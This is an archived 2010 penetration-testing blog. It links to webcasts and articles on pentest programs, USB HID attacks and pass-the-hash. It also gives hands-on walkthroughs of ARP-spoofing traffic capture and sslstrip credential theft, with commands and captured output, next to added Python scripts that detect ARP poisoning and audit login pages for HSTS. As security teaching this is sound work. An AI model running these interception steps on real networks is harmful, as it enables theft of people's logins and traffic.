PaulDotCom: Archives : Zen and The Art Of An Internal Penetration Testing Program

5 09 2010

Ok Ok …. I know I'm 2 years late to post this as a “new” presentation – but there is some interesting & valuable info in here about pentesting your internal network. It starts out pretty high level, but is a nicely rounded overview of the reasons, methods & tools you can use to penetration test your network. Hosted by Core Security & presented by Paul Asadoorian from PaulDotCom.


• Phase I – Target identification
• Phase II – Detect OS & Services
• Phase III – Identify Vulnerabilities
• Phase IV – Exploitation
• Phase V – Post-Exploitation
• Phase VI – Reporting

Part 1 has some great grounding information in penetration testing, with examples for several tools (nmap, Nessus, nbtscan, etc.) and also ways to link them together, e.g. run an nmap scan across the network to identify Windows hosts listening on 445, use the Nmap Scripting Engine to determine if they are vulnerable, and then feed that list of hosts into Nessus or Metasploit.

Part 2 contains more information on why you should exploit a machine, how to exploit it, etc., using both Metasploit & Core Impact. Some useful info on tasks to perform once you have compromised a host: automated info gathering, looking for sensitive data, gathering screenshots, video, sound recordings, etc. This segment ends with some good tips on how to report this information to management, then some Q&A.

There is some great info in here; it's worth a look.

Part 1:

This webcast is Part I of a two part series I am doing in collaboration with Core Security Technologies. The presentation is full of tips, tricks, process, and practical knowledge about performing penetration testing within your own organization. Whether you are a third-party doing penetration tests or want to penetration test your internal network, this webcast is for you! In Part I I cover such topics as finding rogue access points, processes for creating a successful penetration testing program, identifying targets, and more! Information and resources are below:

via PaulDotCom: Archives.


Zen and the Art of an Internal Penetration Testing Program Part I with Paul Asadoorian
Recording date: Wednesday, November 19, 2008 3:00 pm Eastern Standard Time (New York, GMT-05:00)
Panelist Information: Paul Asadoorian of PaulDotCom Security Weekly
Duration: 1 hour 9 minutes

Please join Core Security and Paul Asadoorian, founder of PaulDotCom Security Weekly, for a live webcast: “Zen and the Art of Maintaining an Internal Penetration Testing Program.”

During this webcast, Asadoorian will offer tips on successfully integrating penetration testing into your vulnerability management program. You’ll learn:

* How to determine if internal penetration testing is right for your organization
* What questions you should ask when planning a pen testing initiative
* How you can best pitch testing to other departments and gain permission from management
* What types of tests to run and how to address the process of dealing with compromised devices
* Which tips and tricks can help you carry out faster, more effective testing

Whether you’re considering rolling out an internal penetration testing program or need a refresher of best practices for your current testing initiatives, this webcast is sure to be time well-spent.

via Core Security: Recorded webcast

Part 2:

During the webcast, Paul Asadoorian of PaulDotCom Security Weekly will discuss best practices for automating your security testing initiatives. You’ll learn tips and tricks for tying vulnerability scanning, penetration testing and reporting into an efficient, repeatable testing process. Paul will demonstrate techniques for vulnerability identification and exploitation, including:

• Importing Nmap data into Nessus
• Using Nessus, and running nessuscmd to automate vulnerability scanning
• Importing results into Metasploit
• Running msfcli to automate penetration testing
• Importing Nmap & Nessus results into CORE IMPACT Pro
• Using Python to script tasks on compromised hosts with CORE IMPACT Pro

You’ll also get answers to questions such as, “How do I integrate password cracking into my testing?” and “What should I do once a host is compromised during a test?”

via Core Security: Recorded webcast


Social-Engineer Toolkit v0.6.1 Teensy USB HID Attack Vector | Blog

17 08 2010

hehehe … it was only a matter of time. With devices such as the original YubiKey that I have been using being programmable to auto-launch a website when plugged in, it's good to see the idea going to the next level:

Social-Engineer Toolkit v0.6.1 Teensy USB HID Attack Vector
Posted by relik @ 8:31 pm

The Teensy devices are Arduino based devices that allow you to utilize onboard memory storage on a microcontroller and emulate a keyboard/mouse. The Social-Engineer Toolkit (SET) gives you the ability to choose Metasploit based payloads and drop a small download stager either through WSCRIPT or through PowerShell to download a backdoor from a remote IP/machine and execute it on the system itself. Why this attack is so useful is that it emulates a keyboard 100 percent, so you can essentially bypass any autorun protections on the system since it's a keyboard, not a flash drive or CD/DVD type autorun attack. SET handles the entire creation from a webserver housing the malicious payload, to the actual Metasploit handler.

via Social-Engineer Toolkit v0.6.1 Teensy USB HID Attack Vector | Blog.

Original credit appears to be going to irongeek from his very detailed original posting – including pictures (we all like pictures) here: Programmable HID USB Keystroke Dongle: Using the Teensy as a pen testing device

Dissecting the Pass the Hash Attack

28 07 2010

Nice to see an article including BackTrack on the list. It's a nice writeup on using BackTrack to pass the hash to psexec and remotely launch a reverse shell. If you haven't read much about using password hashes, this would be a good read. It also links to other articles about gaining access to hashed passwords, from physical box access to various tools.

In this article we will look at how this technique works and I will demonstrate the process that can be used to take stolen password hashes and use them successfully without having to crack their hidden contents. As always, I will cover some detection and defensive techniques on how you can prevent yourself from falling victim to this attack.

via Dissecting the Pass the Hash Attack.

Antimeter: Detect & Kill Metasploit Meterpreter! — PenTestIT

9 07 2010

Antimeter is a very useful tool for internal security administrators who can scan their systems for meterpreter session remains after they have successfully exploited any system with Metasploit.

Today most of the penetration testers who can not afford heavily paid security software use Metasploit for penetration testing. A couple of days back, the latest version of Metasploit was released. As most of these tools work or exploit in the memory of the target system, after a successful exploitation it is necessary to clean the system. In such situations antimeter comes in handy. Also, you could use it on an important production server to check for any meterpreter shells and kill them if detected.

via Antimeter: Detect & Kill Metasploit Meterpreter! — PenTestIT.

mitm packet capturing & basic analysis

17 06 2010

We all know the difference between a hub & a switch (if not, this is not the blog for you). As most networks these days will be switched, it's no longer a case of plugging in & dumping packets. So here is the easy way to capture traffic from the network for investigation later. This works with wired or wireless. This is a combination of skillz from my SSLSTRIP post and the Image Extraction post.

Simply put, we use arpspoof to convince the gateway that we are the target, and the target that we are the gateway.

Target selection (our IP is, default gateway is

root@bt:~# ifconfig
eth0      Link encap:Ethernet  HWaddr 00:0c:29:ab:b2:2c
          inet addr:  Bcast:  Mask:
          RX packets:22 errors:0 dropped:0 overruns:0 frame:0
          TX packets:10 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:3682 (3.6 KB)  TX bytes:1753 (1.7 KB)
          Interrupt:19 Base address:0x2000

root@bt:~# netstat -nr
Kernel IP routing table
Destination     Gateway         Genmask         Flags   MSS Window  irtt Iface   U         0 0          0 eth0         UG        0 0          0 eth0

root@bt:~# nmap -sP

Starting Nmap 5.21 ( ) at 2010-06-17 21:10 EST
Nmap scan report for
Host is up (0.00018s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for
Host is up (0.0015s latency).
MAC Address: 00:50:56:E5:F7:F0 (VMware)
Nmap scan report for
Host is up (0.00076s latency).
MAC Address: 00:0C:29:09:04:71 (VMware)
Nmap scan report for
Host is up.
Nmap scan report for
Host is up (0.00050s latency).
MAC Address: 00:50:56:F8:EC:20 (VMware)
Nmap done: 255 IP addresses (5 hosts up) scanned in 4.36 seconds

So we have a couple of other hosts there, we will use

We want to get traffic from to the gateway (internet) sent to us, and traffic from the gateway back to also sent to us, we do that with the following arpspoof commands.

Windows host before arpspoof:

C:\Documents and Settings\Administrator>arp -a

Interface: --- 0x2
  Internet Address      Physical Address      Type          00-50-56-e5-f7-f0     dynamic

arpspoof commands to run on our BackTrack box, not forgetting to enable IP forwarding first:

root@bt:~# echo 1 > /proc/sys/net/ipv4/ip_forward

root@bt:~# arpspoof -i eth0 -t
0:c:29:ab:b2:2c 0:c:29:9:4:71 0806 42: arp reply is-at 0:c:29:ab:b2:2c
0:c:29:ab:b2:2c 0:c:29:9:4:71 0806 42: arp reply is-at 0:c:29:ab:b2:2c

root@bt:~# arpspoof -i eth0 -t
0:c:29:ab:b2:2c 0:50:56:e5:f7:f0 0806 42: arp reply is-at 0:c:29:ab:b2:2c
0:c:29:ab:b2:2c 0:50:56:e5:f7:f0 0806 42: arp reply is-at 0:c:29:ab:b2:2c

And our Windows box?

C:\Documents and Settings\Administrator>arp -a

Interface: --- 0x2
  Internet Address      Physical Address      Type          00-0c-29-ab-b2-2c     dynamic        00-0c-29-ab-b2-2c     dynamic
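The poisoned table above, where the gateway's entry and the other host's entry both carry the BackTrack box's MAC, is exactly the anomaly a host- or network-side monitor can alert on. The following Python is an added example written for this page, not a tool from the original post or from the dsniff suite: it parses Windows `arp -a` output, compares the gateway's MAC against a recorded known-good baseline, and flags any MAC that claims more than one address. The post's IP addresses were lost, so the sample tables use constructed RFC 5737 documentation addresses; the MACs are the ones shown in the post.

```python
import re
from collections import defaultdict

# Constructed sample of Windows `arp -a` output, modelled on the before/after
# tables in the post. IPs are RFC 5737 documentation addresses (constructed);
# the MACs are the post's own: 00-0c-29-ab-b2-2c is the BackTrack box,
# 00-50-56-e5-f7-f0 the real gateway.
ARP_BEFORE = """\
Interface: 192.0.2.201 --- 0x2
  Internet Address      Physical Address      Type
  192.0.2.2             00-50-56-e5-f7-f0     dynamic
"""

ARP_AFTER = """\
Interface: 192.0.2.201 --- 0x2
  Internet Address      Physical Address      Type
  192.0.2.2             00-0c-29-ab-b2-2c     dynamic
  192.0.2.128           00-0c-29-ab-b2-2c     dynamic
"""

# Assumed baseline: the gateway's MAC recorded while the network was known-good.
BASELINE_GATEWAY = ("192.0.2.2", "00-50-56-e5-f7-f0")

# One ARP entry: dotted-quad IP, a 6-byte MAC with '-' or ':' separators, then the type.
ENTRY_RE = re.compile(
    r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+([0-9a-fA-F]{2}(?:[-:][0-9a-fA-F]{2}){5})\s+(\w+)"
)


def parse_arp_table(text):
    """Return {ip: mac} from `arp -a` text; MACs normalised to lower-case, dash-separated."""
    table = {}
    for line in text.splitlines():
        m = ENTRY_RE.match(line)
        if m:
            ip, mac, _entry_type = m.groups()
            table[ip] = mac.lower().replace(":", "-")
    return table


def check_arp_table(text, baseline_gateway=BASELINE_GATEWAY, allowed_shared=frozenset()):
    """Return a list of human-readable findings; empty list means the table looks clean.

    allowed_shared: MACs that legitimately hold several addresses (e.g. a router that
    is also the DHCP and DNS server), so they are not reported as duplicates.
    """
    gw_ip, gw_mac = baseline_gateway
    table = parse_arp_table(text)
    findings = []

    # 1. The gateway's MAC differs from the recorded baseline.
    seen = table.get(gw_ip)
    if seen is not None and seen != gw_mac.lower():
        findings.append(f"gateway {gw_ip} now resolves to {seen}, baseline was {gw_mac}")

    # 2. One MAC answering for several IPs: a host posing as the gateway and as a peer at once.
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    for mac, ips in by_mac.items():
        if len(ips) > 1 and mac not in allowed_shared:
            findings.append(f"{mac} claims {len(ips)} addresses: {', '.join(sorted(ips))}")
    return findings


if __name__ == "__main__":
    for label, table in (("before", ARP_BEFORE), ("after", ARP_AFTER)):
        print(label, check_arp_table(table) or ["no findings"])
```

The duplicate-MAC check needs a whitelist in practice: the `ipconfig /all` output later on this page shows the gateway, DHCP server and DNS server can legitimately be one device. Polling `arp -a` like this is a point-in-time check; on the network side the same comparison is what tools such as arpwatch do continuously, and Dynamic ARP Inspection on managed switches stops the spoofed replies from being accepted at all.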

And of course, kick off your tcpdump session (filtering out the ARP traffic from the spoofing):

root@bt:~# tcpdump -s0 -i eth0 not arp -w eth0capture
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes

So, we have a shiny new file full of data goodness; what to do with it? There are several ways you can look at the data:
urlsnarf – prints http requests
driftnet – extracts files (mainly images) from the capture
tcpxtract – another file extractor for captures **Needs installation, but it got me the best results**

Set up the apps to listen on the local interface in separate windows, then feed your packets into that interface with tcpreplay.

root@bt:~# urlsnarf -i lo
urlsnarf: listening on lo [tcp port 80 or port 8080 or port 3128]

root@bt:~# driftnet -i lo
driftnet: saving `/tmp/driftnet-5VbG3g/driftnet-4c1a110b643c9869.jpeg' as `driftnet-0.jpeg'
driftnet: saving `/tmp/driftnet-5VbG3g/driftnet-4c1a110b643c9869.jpeg' as `driftnet-1.jpeg'

root@bt:~# tcpreplay -i lo eth0capture-s0
sending out lo
processing file: eth0capture-s0
Actual: 18412 packets (15604605 bytes) sent in 105.88 seconds
Rated: 148490.3 bps, 1.13 Mbps/sec, 175.20 pps

Statistics for network device: lo
        Attempted packets:         18412
        Successful packets:        18412
        Failed packets:            0
        Retried packets (ENOBUFS): 0
        Retried packets (EAGAIN):  0

root@bt:~# apt-get install tcpxtract
root@bt:~# mkdir tcpxtract
root@bt:~# tcpxtract -f eth0capture-s0 -o tcpxtract/
Found file of type "html" in session [ ->], exporting to tcpxtract/00000000.html
Found file of type "html" in session [ ->], exporting to tcpxtract/00000001.html

There we go, we extracted some info from the packet capture. Next time I will cover a much nicer util to get our files out of the capture file.

image extraction from packet capture

13 06 2010

Some very interesting tools used in this vid, showing that you don't need to be watching live streams to catch interesting fish 😀

Great video on using ettercap to capture traffic & a selection of tools to extract data (mainly images) from the traffic.

tcpxtract (can be installed from the backtrack repos)
urlsnarf/driftnet -> dsniff suite

Linked from the following post from “adaywithtape”

capturing credentials with sslstrip

11 06 2010

You may or may not have seen this tool before, there are plenty of videos around that show you how to use it – let me add one more “howto” & show you my fun with it.


You are attached to the same network (sorry kids, not a remote vector) as the victim with a BackTrack machine (doesn't need to be BackTrack, but I use it regularly) and have downloaded sslstrip.

Get it: download & unpack

root@bt:~/scripts/sslstrip# wget
root@bt:~/scripts/sslstrip# tar zxvf sslstrip-0.7.tar.gz

Setup: you need to enable IP forwarding in Linux & set up a redirect of all port 80 traffic to port 10000 (the default sslstrip port). Run sslstrip & get it to write the credentials out to a file with -w:

root@bt:~/scripts/sslstrip# echo 1 > /proc/sys/net/ipv4/ip_forward
root@bt:~/scripts/sslstrip# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
root@bt:~/scripts/sslstrip/sslstrip-0.7# python -f -w sslcreds-captured

Once this is done, we are nearly there – now to get users to send their traffic through your machine on the way to the gateway. In this case, the target is & the real gateway is

root@bt:~# arpspoof -i eth0 -t
0:c:29:ab:b2:2c 0:c:29:9:4:71 0806 42: arp reply is-at 0:c:29:ab:b2:2c
0:c:29:ab:b2:2c 0:c:29:9:4:71 0806 42: arp reply is-at 0:c:29:ab:b2:2c
0:c:29:ab:b2:2c 0:c:29:9:4:71 0806 42: arp reply is-at 0:c:29:ab:b2:2c
0:c:29:ab:b2:2c 0:c:29:9:4:71 0806 42: arp reply is-at 0:c:29:ab:b2:2c

Cool – so now what … what have we actually done … let's deconstruct it a little:

Firstly, Linux has been configured to forward packets, and we set up an iptables redirect rule that sends all port 80 traffic to sslstrip, which we ran on its default port 10000 and told to write out to the log file sslcreds-captured.

Next was to get the target to send its traffic to us instead of the gateway: using arpspoof we tell our target that the gateway address of is actually our NIC.

Our target machine's NIC is 00-0C-29-09-04-71, which arpspoof resolved automatically when we ran it.

We could have easily gathered this from the BackTrack machine:

root@bt:~# nmap -sP

Starting Nmap 5.21 ( ) at 2010-06-10 22:18 EST
Nmap scan report for
Host is up (0.00049s latency).
MAC Address: 00:0C:29:09:04:71 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.08 seconds

But to show the actual client config, here is the Windows ipconfig /all output:

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix  . :
Description . . . . . . . . . . . : VMware Accelerated AMD PCNet Adapter

Physical Address. . . . . . . . . : 00-0C-29-09-04-71
Dhcp Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
IP Address. . . . . . . . . . . . :
Subnet Mask . . . . . . . . . . . :
Default Gateway . . . . . . . . . :
DHCP Server . . . . . . . . . . . :
DNS Servers . . . . . . . . . . . :
Lease Obtained. . . . . . . . . . : Thursday, 10 June 2010 8:54:17 PM
Lease Expires . . . . . . . . . . : Friday, 11 June 2010 8:54:17 PM

So, what does the ARP spoofing look like on the target?

C:\Documents and Settings\Administrator>arp -a

Interface: --- 0x2
Internet Address      Physical Address      Type         00-02-b3-a9-a5-13     dynamic


C:\Documents and Settings\Administrator>arp -a

Interface: --- 0x2
Internet Address      Physical Address      Type         00-0c-29-ab-b2-2c     dynamic

Notice the original gateway MAC address 00-02-b3-a9-a5-13 has been replaced by our attacker MAC 00-0c-29-ab-b2-2c.

User Experience:
We will use GMAIL as an example of this, but many web pages use http for the page body & only use https for the form post, which this script takes advantage of.

So our user wants to log in to their GMAIL account, so they fire up the browser & type in

Normal GMAIL page:

***Notice the url is https://……… & there is a padlock on the right hand side***

sslstrip GMAIL page:

***Notice the url is actually http://……… & there is a padlock on the left hand side, this padlock is actually a favicon of a padlock added by sslstrip to trick those not paying attention***

This is the only difference the user sees: sslstrip detects the https links in the pages requested & rewrites them as http before passing them back to the client. From sslstrip to the server the connection is still https, so GMAIL is happy it's an SSL connection, & the target is happy as he sees the identical logon page he is used to seeing, only delivered as an http page rather than https. As we never present an https page to the user, there are zero certificate warnings.
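The conditions the paragraph above depends on are exactly what a site owner can audit for: a login page whose body arrives over http, https used only for the form post, and no HSTS policy telling the browser to refuse plain http for the site. The following Python is an added example written for this page, not code from sslstrip or from the original post. It takes a fetched URL, its response headers and body, and reports those weaknesses; mail.example.test and both responses are constructed, and the one-year max-age threshold is an assumption taken from common HSTS guidance.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

ONE_YEAR = 31536000  # seconds; assumed minimum HSTS max-age, per common guidance


class FormScanner(HTMLParser):
    """Collects every <form> action and whether that form holds a password field."""

    def __init__(self):
        super().__init__()
        self.forms = []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self.forms.append({"action": a.get("action", ""), "has_password": False})
        elif tag == "input" and a.get("type", "").lower() == "password" and self.forms:
            self.forms[-1]["has_password"] = True


def hsts_max_age(value):
    """Parse max-age out of a Strict-Transport-Security header; None if absent or malformed."""
    for directive in value.split(";"):
        name, _, val = directive.strip().partition("=")
        if name.strip().lower() == "max-age":
            try:
                return int(val.strip().strip('"'))
            except ValueError:
                return None
    return None


def audit_login_page(url, headers, body):
    """Return a list of findings for one fetched login page; empty means no weakness found."""
    findings = []
    scheme = urlsplit(url).scheme
    hdrs = {k.lower(): v for k, v in headers.items()}

    if scheme == "http":
        # Anything in an http body can be rewritten on the path; the browser cannot tell.
        findings.append("login page body delivered over plain http")
    else:
        # Browsers only honour HSTS on https responses, so check it only there.
        hsts = hdrs.get("strict-transport-security")
        if hsts is None:
            findings.append("https response carries no Strict-Transport-Security header")
        else:
            age = hsts_max_age(hsts)
            if age is None or age < ONE_YEAR:
                findings.append(f"HSTS max-age is {age}, below the one-year recommendation")

    scanner = FormScanner()
    scanner.feed(body)
    for form in scanner.forms:
        if not form["has_password"]:
            continue
        target = urljoin(url, form["action"])
        if urlsplit(target).scheme != "https":
            findings.append(f"password form posts to {target} over plain http")
        elif scheme == "http":
            findings.append("https form post embedded in an http page: the pattern sslstrip rewrites")
    return findings


# Constructed samples; mail.example.test is a placeholder, not the post's GMAIL target.
LOGIN_FORM = """<html><body>
<form action="{action}" method="post">
  <input name="user"><input type="password" name="pass">
</form></body></html>"""

# The pattern the post describes: http page body, https only on the form post, no HSTS.
WEAK = ("http://mail.example.test/login",
        {"Content-Type": "text/html"},
        LOGIN_FORM.format(action="https://mail.example.test/auth"))

# Hardened: whole page over https, HSTS with a one-year max-age, relative form action.
HARDENED = ("https://mail.example.test/login",
            {"Content-Type": "text/html",
             "Strict-Transport-Security": "max-age=31536000; includeSubDomains"},
            LOGIN_FORM.format(action="/auth"))

if __name__ == "__main__":
    for label, page in (("weak", WEAK), ("hardened", HARDENED)):
        print(label, audit_login_page(*page) or ["no findings"])
```

Feed it the responses captured for each login URL, http and https alike. The http finding matters even when HSTS is present: the policy only takes effect after the browser has completed one https visit (or the domain is in the browsers' preload list), so the first plain-http request is exactly the one an on-path rewrite can catch.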

So he logs in, gets his mail & lives happily ever after:


Remember we were writing to an output file:

root@bt:~/scripts/sslstrip/sslstrip-0.7# cat sslcreds-captured
2010-06-10 22:07:25,992 SECURE POST Data (

The most interesting bits of that are ..
*note, the %24 is actually the URL-encoded form (hex 24) of the dollar ‘$’ symbol
Because johndoe is super secure & has chosen a long password he must be safe …. except for that one time he connected at the wrong internet cafe ……